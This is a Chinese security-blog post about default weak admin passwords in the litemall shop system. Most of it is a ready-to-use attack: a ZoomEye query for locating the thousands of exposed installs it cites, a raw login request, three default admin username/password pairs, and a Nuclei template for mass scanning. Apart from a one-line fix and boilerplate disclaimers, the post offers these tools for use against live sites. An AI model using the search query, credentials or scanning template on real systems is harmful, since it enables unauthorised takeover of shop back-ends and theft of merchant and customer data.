Litemall-Login开源商城管理系统存在弱口令漏洞(大量存在)-漏洞挖掘

admin
admin
admin
138635
文章
114
评论
2024年2月21日23:56:20评论42 views字数 1979阅读6分35秒阅读模式

0x01 产品简介

   litemall是一款小型商场系统的开发工具,使用者可通过该系统来完成前端、后端、小程序以及移动端等开发工作,使整个工作效率得到大幅度提升。该系统开发的功能包括了会员管理、商城管理、商品管理、客服等,有了这个工具便能轻轻松松获得完整的商场系统。这里我推荐利用 ZoomEye搜索引擎直接输入关键字即可,影响资产5000+

Litemall-Login开源商城管理系统存在弱口令漏洞(大量存在)-漏洞挖掘

Litemall-Login开源商城管理系统存在弱口令漏洞(大量存在)-漏洞挖掘

声明

请自行搭建环境进行漏洞测试,该公众号或作者星球分享的工具、项目、漏洞仅供安全研究与学习之用请勿用于非法行为,如用于其他用途,由使用者承担全部法律及连带责任,与作者和本公众号无关。

TIPS: 末尾领取资料及福利-批量检测脚本在末尾

0x02 漏洞描述

        攻击者可以利用弱口令漏洞直接访问应用系统或管理系统,进而进行系统、网页、数据的篡改或删除,非法窃取系统和用户的敏感数据,有时甚至导致整个服务器受到严重威胁。弱口令并没有严格的定义,但它们通常指的是那些容易被他人轻易猜测到或通过自动化工具破解的密码,例如简单的数字和字母组合,如"123456"、"abc"等。为了避免这些风险,强烈建议用户不要使用这类易受攻击的密码。

0x03 ZoomEye语法

app:"litemall"

Litemall-Login开源商城管理系统存在弱口令漏洞(大量存在)-漏洞挖掘

0x04 漏洞复现

POC

POST /admin/auth/login HTTP/1.1Host: {hostname}Cookie: JSESSIONID=36427362-df7c-4e7c-b5ab-367e3eb92d48Content-Length: 55Sec-Ch-Ua: "Not A(Brand";v="99", "Google Chrome";v="121", "Chromium";v="121"Accept: application/json, text/plain, */*Content-Type: application/jsonSec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Sec-Ch-Ua-Platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9,en;q=0.8Connection: close{"username":"admin123","password":"admin123","code":""}

弱密码

超级管理员用户名: admin123 超级管理员用户名:admin123商城管理员用户名: mall123 商城管理员用户名:mall123推广管理员用户名: promotion123 推广管理员用户名:promotion123

Litemall-Login开源商城管理系统存在弱口令漏洞(大量存在)-漏洞挖掘

Nuclei批量检测POC(请自行搭建环境检测)
id: litemall-weak-passwdinfo:  name: litemall-weak-passwd  author: 渗透安全HackTwo  severity: high  description: |    漏洞测试-公众号-渗透安全HackTwo  reference:    - https://127.0.0.1  tags: autohttp:  - raw:      - |        POST /admin/auth/login HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36        Content-Type: application/json        Accept: application/json, text/plain, */*        Accept-Encoding: gzip, deflate, br        Accept-Language: zh-CN,zh;q=0.9b        Connection: close        {"username":"admin123","password":"admin123","code":""}    matchers-condition: and    matchers:      - type: dsl        dsl:          - status_code==200 && contains_all(body, '"errmsg":"成功"')

Litemall-Login开源商城管理系统存在弱口令漏洞(大量存在)-漏洞挖掘

0x05 修复建议

修改弱口令

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月21日23:56:20
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Litemall-Login开源商城管理系统存在弱口令漏洞(大量存在)-漏洞挖掘https://cn-sec.com/archives/2507322.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息